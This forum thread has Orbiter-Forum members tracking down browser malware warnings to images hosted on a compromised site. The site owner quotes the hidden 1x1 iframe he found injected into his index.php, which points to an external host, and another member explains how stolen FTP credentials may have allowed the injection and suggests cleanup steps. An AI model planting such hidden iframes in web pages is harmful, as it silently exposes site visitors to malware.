Question Anyone else getting a security warning here in OF?

[HarvesteR]

Hi,

Is it just me, or is anyone else getting browser security warnings every now and then here on the forums?

Sometimes, when I click on a link at the main page's update board, Chrome gives me a red screen saying the site has content from unrealaddicts.com, which is identified as a malicious site...

I'm quite sure there is nothing wrong here in OF, so I was wondering what could be triggering that warning... could it be some ad banner or something like that?(which would be strange, since I never saw an ad banner here)

Cheers

 

[jangofett287]

I'm getting that too, but for me it only happens here

 

[DaveS]

I'm getting that too, but for me it only happens here

The Google security warning is triggered by some users' signature images that are hosted on unrealaddicts.com. This could be fixed by the affected users' simply upload their signature images some place else.

 

[orb]

I'm getting that too, but for me it only happens here

I got the same security warning for that thread and only that thread in Chromium yesterday. There were no warnings for other pages. I looked at the HTML code of it, but I couldn't find anything suspicious. All other browsers I have (Firefox, Opera, Safari, K-Meleon, IE) display that page without any warnings.

 

[Fizyk]

I just got it here. I've had it in some other places too, but I don't remember where exactly.

 

[orb]

The issue should be fixed now. If you find any other thread with this warning please post a link to it in this thread.

 

[Xyon]

No warning in either thread just now on Chrome 12.0.742.30 dev-m.

 

[Eli13]

I've gotten it in all the places previously mentioned. Brand new chrome, just updated. Well, not anymore thanks to Orb.

 

[Kveldulf]

Just got the warning again. Same details (something hosted on unrealaddicts). Found it on the last page of the Demotivators thread.

 

[Bonanza123d]

I got the same security warning for that thread and only that thread in Chromium yesterday. There were no warnings for other pages. I looked at the HTML code of it, but I couldn't find anything suspicious. All other browsers I have (Firefox, Opera, Safari, K-Meleon, IE) display that page without any warnings.

Your not the only one that is a developer. I will keep an eye out on these security warnings.

 

[orb]

Just got the warning again. Same details (something hosted on unrealaddicts). Found it on the last page of the Demotivators thread.

You should get no warning now. The post causing that warning has been temporarily taken out of view, until pictures from it will be uploaded to another server.

 

[HarvesteR]

Nice!! Thanks Orb!

Cheers

 

[RisingFury]

Hi!

The security warnings come from www.unrealaddicts.com, where I've uploaded the OBSP sigs for myself, Lunar_Lander, escapetomsfate, T.Neo and Kaito. It seems that someone flagged the website as a security risk. My guess is that's either because the vBulleting forum is down, or someone just freaked out when they saw the error...

I currently don't have access to the FTP until the weekend so I'll take care of it on Friday. I apologize to everyone that's been inconvenienced by this and I'd like to assure you that I haven't uploaded anything that could compromise your security.

I've asked the OF staff to remove the signatures from the members above, in case they haven't done it yet. I'd also like to urge you to avoid threads where I've posted any images. Most of them are in the 'RC DeltaGliderIV' thread and a few are in the 'Orbiter demotivators' thread...

Again I apologize for this inconvenience, I'll sort it out on Friday.

 

[orb]

Hi!

The security warnings come from www.unrealaddicts.com, where I've uploaded the OBSP sigs for myself, Lunar_Lander, escapetomsfate, T.Neo and Kaito.

Signature of escapetomsfate is safe as it was uploaded to Orbiter-Forum, and Kaito's signature doesn't use that picture.

 

[RisingFury]

It seems I've identified the most likely cause for the Google freakout on my website:

<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2848724"></iframe>

Anyone have a clue how in hell that got into my index.php file?! It's definitely not a line I wrote. Everything I write is within the

<?php ?>

tags.


Only a few people have access to the FTP, but I doubt anyone of them put this line of code on my website. How the hell does an external entity get access to my files?


I'm going to contact the main admin, but given that the UT community isn't what it used to be, I hope I can a hold of him...


For now, I've removed the line. I'm going to look through the remainder of the code if there's anything there, but given that all of the content is in XML files and being read by the code, there's thankfully not much to look through.


Given the large amount of web savvy people we have on OF, hopefully someone can provide an answer to my question...

 

[orb]

Only a few people have access to the FTP, but I doubt anyone of them put this line of code on my website. How the hell does an external entity get access to my files?

They didn't put that themselves (the code got injected without their knowledge), but it could be done with help of a malware that got installed on a computer that accessed the website via FTP (the password might be logged and sent to the place from where the code has been injected, or the code has been injected directly from the computer which accessed the FTP).

Make sure all the people who have the access rescan their computers for viruses/trojans, then the FTP password will need to be changed and every file on the server checked for such iframes, as also for unknown javascript, flash or java embedded objects, etc.

You can get more information about this infection when you search on Google for: curem.net iframe.

 

[RisingFury]

I've already requested the lead admin change all FTP passwords and shut down any inactive FTP accounts... I've gone through the server and located several files that were added, .htaccess, .php as well as thousands of html files which I'm unable to delete.

Hopefully the lead admin can correct this. I've already begun backing up all the vital files and I scanned this computer - no viruses detected, unfortunately...